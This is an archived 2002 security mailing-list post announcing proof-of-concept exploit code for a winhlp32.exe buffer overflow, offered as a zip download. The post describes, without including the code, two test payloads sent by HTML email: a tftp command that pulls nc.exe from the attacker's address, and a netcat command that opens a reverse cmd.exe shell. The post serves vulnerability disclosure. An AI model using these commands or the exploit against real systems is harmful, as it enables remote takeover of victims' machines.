winhlp32.exe buffer overflow exploit code.

From: Gary O'leary-Steele (garyo@sec-1.com)
Date: Mon Aug 12 2002 - 08:22:10 PDT

    Hello all,

    For some reason my previous posts did not make it onto security focus ?-)

    The following is a link to proof of concept code /exploit code for this
    overflow. The shell code is relatively small but effective if used
    correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and
    a html output file. There are two versions included in the zip.

    http://www.sec-1.com/help.zip

    HelpMe.pl	// Was written to work with my machine Kernel32.dll version
    5.0.2195.4272 (Rare ?)

    HelpMe2.pl	// Was written to work with all other machines I tested.
    kernel32.dll version 5.0.2195.2778

    I have tested the exploit using two html emails.

    email 1	Executes tftp.exe -i my.ip.address get nc.exe
    c:\winnt\system32\nc.exe

    email 2 	Executes nc.exe my.ip.address 80 -e cmd.exe

    If the exploit executes correctly exitprocess()is called so no error occurs.

    Kind Regards
    Gary O'leary-Steele
    XScan Team
    www.Sec-1.com

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/